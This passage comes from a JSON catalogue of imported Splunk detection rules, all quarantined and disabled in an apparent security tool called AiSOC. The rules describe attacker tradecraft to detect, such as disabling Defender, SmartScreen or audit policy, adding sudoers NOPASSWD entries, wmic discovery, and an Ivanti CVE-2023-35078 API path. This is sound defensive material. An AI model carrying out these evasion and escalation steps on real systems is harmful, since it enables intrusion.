"4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_authenticationleveloverride.yml" } }, { "id": "splunk-security-content-64bc2fa3-c493-44b4-8e94-3e5dbf71377e", "type": "detection", "name": "ESXi Loghost Config Tampering", "description": "This detection identifies changes to the syslog loghost configuration on an ESXi host, which may indicate an attempt to disrupt log forwarding and evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-loghost-config-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "64bc2fa3-c493-44b4-8e94-3e5dbf71377e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_loghost_config_tampering.yml" } }, { "id": "splunk-security-content-64c7adaa-48ee-483c-b0d6-7175bc65e6cc", "type": "detection", "name": "Domain Controller Discovery with Wmic", "description": "The following analytic identifies the execution of `wmic.exe` with command-line arguments used to discover domain controllers in a Windows domain. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because it is commonly used by adversaries and Red Teams for situational awareness and Active Directory discovery. If confirmed malicious, this behavior could allow attackers to map out the network, identify key systems, and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-controller-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "64c7adaa-48ee-483c-b0d6-7175bc65e6cc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_controller_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-64eb091f-8cab-4b41-9b09-8fb4942377df", "type": "detection", "name": "Windows Snake Malware Service Create", "description": "The following analytic detects the creation of a new service named WerFaultSvc with a binary path in the Windows WinSxS directory. It leverages Windows System logs, specifically EventCode 7045, to identify this activity. This behavior is significant because it indicates the presence of Snake malware, which uses this service to maintain persistence by blending in with legitimate Windows services. If confirmed malicious, this activity could allow an attacker to execute Snake malware components, leading to potential data exfiltration, system compromise, and long-term persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-snake-malware-service-create.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "64eb091f-8cab-4b41-9b09-8fb4942377df", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_snake_malware_service_create.yml" } }, { "id": "splunk-security-content-64f91df1-49ec-46aa-81bd-2282d3cea765", "type": "detection", "name": "Geographic Improbable Location", "description": "Geolocation data can be inaccurate or easily spoofed by Remote Employment Fraud (REF) workers. REF actors sometimes slip up and reveal their true location, creating what we call 'improbable travel' scenarios \u2014 logins from opposite sides of the world within minutes. This identifies situations where these travel scenarios occur.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/geographic-improbable-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "64f91df1-49ec-46aa-81bd-2282d3cea765", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/geographic_improbable_location.yml" } }, { "id": "splunk-security-content-64fa82dd-fd11-472a-9e94-c221fffa591d", "type": "detection", "name": "Windows Modify Registry Utilize ProgIDs", "description": "The following analytic detects modifications to the Windows Registry specifically targeting Programmatic Identifier associations to bypass User Account Control (UAC) Windows OS feature. ValleyRAT may create or alter registry entries to targetted progIDs like `.pwn` files with malicious processes, allowing it to execute harmful scripts or commands when these files are opened. By monitoring for unusual changes in registry keys linked to ProgIDs, this detection enables security analysts to identify potential threats like ValleyRAT execution attempts. Early detection of these modifications helps mitigate unauthorized execution and prevents further exploitation of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-utilize-progids.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "64fa82dd-fd11-472a-9e94-c221fffa591d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_utilize_progids.yml" } }, { "id": "splunk-security-content-651df959-ad17-4b73-a323-90cb96d5fa1b", "type": "detection", "name": "Linux Auditd Nopasswd Entry In Sudoers File", "description": "The following analytic detects the addition of NOPASSWD entries to the /etc/sudoers file on Linux systems. It leverages Linux Auditd data to identify command lines containing \"NOPASSWD:\". This activity is significant because it allows users to execute commands with elevated privileges without requiring a password, which can be exploited by adversaries to maintain persistent, privileged access. If confirmed malicious, this could lead to unauthorized privilege escalation, persistent access, and potential compromise of sensitive data and system integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-nopasswd-entry-in-sudoers-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "651df959-ad17-4b73-a323-90cb96d5fa1b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_nopasswd_entry_in_sudoers_file.yml" } }, { "id": "splunk-security-content-651ee958-a433-471c-b264-39725b788b83", "type": "detection", "name": "PowerShell Invoke CIMMethod CIMSession", "description": "The following analytic detects the creation of a New-CIMSession cmdlet followed by the use of the Invoke-CIMMethod cmdlet within PowerShell. It leverages PowerShell Script Block Logging to identify these specific cmdlets in the ScriptBlockText field. This activity is significant because it mirrors the behavior of the Invoke-WMIMethod cmdlet, often used for remote code execution via NTLMv2 pass-the-hash authentication. If confirmed malicious, this could allow an attacker to execute commands remotely, potentially leading to unauthorized access and control over targeted systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-invoke-cimmethod-cimsession.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "651ee958-a433-471c-b264-39725b788b83", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_invoke_cimmethod_cimsession.yml" } }, { "id": "splunk-security-content-65224d8b-b95d-44ec-bb44-408d830c1258", "type": "detection", "name": "Windows Disable Internet Explorer Addons", "description": "The following analytic detects the execution of iexplore.exe (Internet Explorer) with the -extoff command-line flag, which disables all browser extensions. This flag is commonly abused by adversaries to launch a clean browser session that bypasses security controls such as antivirus browser extensions, toolbars, or group policy-enforced add-ons.\nMalicious documents or scripts may leverage iexplore.exe -extoff to open phishing pages, command-and-control interfaces, or download additional payloads in an environment free from security monitoring plugins. While this flag may be used legitimately by IT administrators for troubleshooting purposes, its use in modern enterprise environments is rare and should be considered suspicious\u2014particularly when launched by Office applications, scripting engines (e.g., PowerShell, WScript), or scheduled tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1176.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-internet-explorer-addons.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "65224d8b-b95d-44ec-bb44-408d830c1258", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_internet_explorer_addons.yml" } }, { "id": "splunk-security-content-65615b3a-62ea-4d65-bb9f-6f07c17df4ea", "type": "detection", "name": "Windows WinLogon with Public Network Connection", "description": "The following analytic detects instances of Winlogon.exe, a critical Windows process, connecting to public IP addresses. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on network connections made by Winlogon.exe. Under normal circumstances, Winlogon.exe should not connect to public IPs, and such activity may indicate a compromise, such as the BlackLotus bootkit attack. This detection is significant as it highlights potential system integrity breaches. If confirmed malicious, attackers could maintain persistence, bypass security measures, and compromise the system at a fundamental level.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1542.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-winlogon-with-public-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "65615b3a-62ea-4d65-bb9f-6f07c17df4ea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_winlogon_with_public_network_connection.yml" } }, { "id": "splunk-security-content-65711630-f9bf-11eb-8d72-acde48001122", "type": "detection", "name": "Powershell Execute COM Object", "description": "The following analytic detects the execution of a COM CLSID through PowerShell. It leverages EventCode 4104 and searches for specific script block text indicating the creation of a COM object. This activity is significant as it is commonly used by adversaries and malware, such as the Conti ransomware, to execute commands, potentially for privilege escalation or bypassing User Account Control (UAC). If confirmed malicious, this technique could allow attackers to gain elevated privileges or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-execute-com-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "65711630-f9bf-11eb-8d72-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_execute_com_object.yml" } }, { "id": "splunk-security-content-657902a9-987d-4879-a1b2-e7a65512824b", "type": "detection", "name": "AWS Disable Bucket Versioning", "description": "The following analytic detects when AWS S3 bucket versioning is suspended by a user. It leverages AWS CloudTrail logs to identify `PutBucketVersioning` events with the `VersioningConfiguration.Status` set to `Suspended`. This activity is significant because disabling versioning can prevent recovery of deleted or modified data, which is a common tactic in ransomware attacks. If confirmed malicious, this action could lead to data loss and hinder recovery efforts, severely impacting data integrity and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-disable-bucket-versioning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "657902a9-987d-4879-a1b2-e7a65512824b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_disable_bucket_versioning.yml" } }, { "id": "splunk-security-content-65862e8a-799a-4509-ae1c-4602aa139580", "type": "detection", "name": "Cisco Duo Policy Bypass 2FA", "description": "The following analytic detects instances where a Duo policy is created or updated to allow access without two-factor authentication (2FA). It identifies this behavior by searching Duo administrator activity logs for policy changes that set the authentication status to \"Allow access without 2FA.\" By monitoring for these specific actions, the analytic highlights potential attempts to weaken authentication controls, which could be indicative of malicious activity or insider threats. This behavior is critical for a SOC to identify, as bypassing 2FA significantly reduces the security posture of an organization, making it easier for attackers to gain unauthorized access to sensitive systems and data. Detecting and responding to such policy changes promptly helps prevent potential account compromise and mitigates the risk of broader security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-bypass-2fa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "65862e8a-799a-4509-ae1c-4602aa139580", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_bypass_2fa.yml" } }, { "id": "splunk-security-content-65d4b105-ec52-48ec-ac46-289d0fbf7d96", "type": "detection", "name": "Windows Impair Defense Delete Win Defender Profile Registry", "description": "The following analytic detects the deletion of the Windows Defender main profile registry key. It leverages data from the Endpoint.Registry datamodel, specifically monitoring for deleted actions within the Windows Defender registry path. This activity is significant as it indicates potential tampering with security defenses, often associated with Remote Access Trojans (RATs) and other malware. If confirmed malicious, this action could allow an attacker to disable Windows Defender, reducing the system's ability to detect and respond to further malicious activities, thereby compromising endpoint security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-delete-win-defender-profile-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "65d4b105-ec52-48ec-ac46-289d0fbf7d96", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_delete_win_defender_profile_registry.yml" } }, { "id": "splunk-security-content-663a7a50-b752-4c84-975b-8325ca3f6f9e", "type": "detection", "name": "Windows Audit Policy Auditing Option Disabled via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/set\", \"/option\" and \"/value:disable\" command-line arguments used to disable specific auditing options of the audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-auditing-option-disabled-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "663a7a50-b752-4c84-975b-8325ca3f6f9e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_auditing_option_disabled_via_auditpol.yml" } }, { "id": "splunk-security-content-664f0fd0-91ff-11eb-a56f-acde48001122", "type": "detection", "name": "Disable Windows SmartScreen Protection", "description": "The following analytic detects modifications to the Windows registry that disable SmartScreen protection. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with SmartScreen settings. This activity is significant because SmartScreen provides an early warning system against phishing and malware. Disabling it can indicate malicious intent, often seen in Remote Access Trojans (RATs) to evade detection while downloading additional payloads. If confirmed malicious, this action could allow attackers to bypass security measures, increasing the risk of successful phishing attacks and malware infections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-windows-smartscreen-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "664f0fd0-91ff-11eb-a56f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_windows_smartscreen_protection.yml" } }, { "id": "splunk-security-content-66ab15c0-63d0-11ec-9e70-acde48001122", "type": "detection", "name": "Linux Common Process For Elevation Control", "description": "The following analytic identifies the execution of common Linux processes used for elevation control, such as `chmod`, `chown`, and `setuid`. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because these processes are often abused by adversaries to gain persistence or escalate privileges on compromised hosts. If confirmed malicious, this behavior could allow attackers to modify file attributes, change file ownership, or set user IDs, potentially leading to unauthorized access and control over critical system resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-common-process-for-elevation-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66ab15c0-63d0-11ec-9e70-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_common_process_for_elevation_control.yml" } }, { "id": "splunk-security-content-66adc486-224d-45c1-8e4d-9e7eeaba988f", "type": "detection", "name": "O365 Multiple AppIDs and UserAgents Authentication Spike", "description": "The following analytic identifies unusual authentication activity in an O365 environment, where a single user account experiences more than 8 authentication attempts using 3 or more unique application IDs and over 5 unique user agents within a short timeframe. It leverages O365 audit logs, focusing on authentication events and applying statistical thresholds. This behavior is significant as it may indicate an adversary probing for multi-factor authentication weaknesses. If confirmed malicious, it suggests a compromised account, potentially leading to unauthorized access, privilege escalation, and data exfiltration. Early detection is crucial to prevent further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-appids-and-useragents-authentication-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66adc486-224d-45c1-8e4d-9e7eeaba988f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_appids_and_useragents_authentication_spike.yml" } }, { "id": "splunk-security-content-66b6ad5e-339a-40af-b721-dacefc7bdb75", "type": "detection", "name": "Windows AD Hidden OU Creation", "description": "This analytic is looking for when an ACL is applied to an OU which denies listing the objects residing in the OU. This activity combined with modifying the owner of the OU will hide AD objects even from domain administrators.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-hidden-ou-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66b6ad5e-339a-40af-b721-dacefc7bdb75", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_hidden_ou_creation.yml" } }, { "id": "splunk-security-content-66b9c9ba-7fb2-4e80-a3a2-496e5e078167", "type": "detection", "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35078", "description": "The following analytic detects attempts to exploit CVE-2023-35078, a vulnerability in Ivanti Endpoint Manager Mobile (EPMM) versions up to 11.4.\nIt identifies HTTP requests to the endpoint \"/mifs/aad/api/v2/authorized/users?*\" with a status code of 200 in web logs.\nThis activity is significant as it indicates unauthorized remote access to restricted functionalities or resources.\nIf confirmed malicious, this could lead to data theft, unauthorized modifications, or further system compromise, necessitating immediate action to mitigate potential severe impacts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-epmm-remote-unauthenticated-api-access-cve-2023-35078.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66b9c9ba-7fb2-4e80-a3a2-496e5e078167", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35078.yml" } }, { "id": "splunk-security-content-66cb378f-234d-4fe1-bb4c-e7878ff6b017", "type": "detection", "name": "Azure AD Multiple Service Principals Created by SP", "description": "The following analytic detects when a single service principal in Azure AD creates more than three unique OAuth applications within a 10-minute span. It leverages Azure AD audit logs, specifically monitoring the 'Add service principal' operation initiated by service principals. This behavior is significant as it may indicate an attacker using a compromised or malicious service principal to rapidly establish multiple service principals, potentially staging an attack. If confirmed malicious, this activity could facilitate network infiltration or expansion, allowing the attacker to gain unauthorized access and persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-service-principals-created-by-sp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66cb378f-234d-4fe1-bb4c-e7878ff6b017", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_service_principals_created_by_sp.yml" } }, { "id": "splunk-security-content-66f22f52-fbae-4be7-a263-561dacb63612", "type": "detection", "name": "Cisco Secure Firewall - Lumma Stealer Outbound Connection Attempt", "description": "This analytic detects Lumma Stealer outbound connection attempts using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where Snort signatures with IDs 64797, 64798, 64799, 64800, 64801, 64167, 64168, 64169, 62709 have been triggered. If confirmed malicious, this behavior could indicate an active infection of Lumma Stealer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1573.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-lumma-stealer-outbound-connection-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66f22f52-fbae-4be7-a263-561dacb63612", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___lumma_stealer_outbound_connection_attempt.yml" } }, { "id": "splunk-security-content-66f22f52-fbae-4be7-a263-561dacb63613", "type": "detection", "name": "Cisco Secure Firewall - Lumma Stealer Download Attempt", "description": "This analytic detects Lumma Stealer download attempts using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where Snort signatures with IDs 64797, 64798, 64799, 64800, 64801, 64167, 64168, 64169 have been triggered. If confirmed malicious, this behavior could indicate an active infection of Lumma Stealer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1573.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-lumma-stealer-download-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66f22f52-fbae-4be7-a263-561dacb63613", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___lumma_stealer_download_attempt.yml" } }, { "id": "splunk-security-content-66f737c6-3f7f-46ed-8e9b-cc0e5bf01f04", "type": "detection", "name": "Linux Auditd Unix Shell Configuration Modification", "description": "The following analytic detects suspicious access or modifications to Unix shell configuration files, which may indicate an attempt to alter system behavior or gain unauthorized access.\nUnix shell configuration files, such as `.bashrc` or `.profile`, control user environment settings and command execution.\nUnauthorized changes to these files can be used to execute malicious commands, escalate privileges, or hide malicious activities.\nBy monitoring for unusual or unauthorized modifications to shell configuration files, this analytic helps identify potential security threats, allowing security teams to respond quickly and mitigate risks.\nCorrelate this with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-unix-shell-configuration-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66f737c6-3f7f-46ed-8e9b-cc0e5bf01f04", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_unix_shell_configuration_modification.yml" } }, { "id": "splunk-security-content-67340df1-3f1d-4470-93c8-9ac7249d11b0", "type": "detection", "name": "Windows RDPClient Connection Sequence Events", "description": "This analytic monitors Windows RDP client connection sequence events (EventCode 1024) from the Microsoft-Windows-TerminalServices-RDPClient/Operational log. These events track when RDP ClientActiveX initiates connection attempts to remote servers. The connection sequence is a critical phase of RDP where the client and server exchange settings and establish common parameters for the session. Monitoring these events can help identify unusual RDP connection patterns, potential lateral movement attempts, unauthorized remote access activity, and RDP connection chains that may indicate compromised systems. NOTE the analytic was written for Multi-Line as XML was not properly parsed out.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdpclient-connection-sequence-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "67340df1-3f1d-4470-93c8-9ac7249d11b0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": 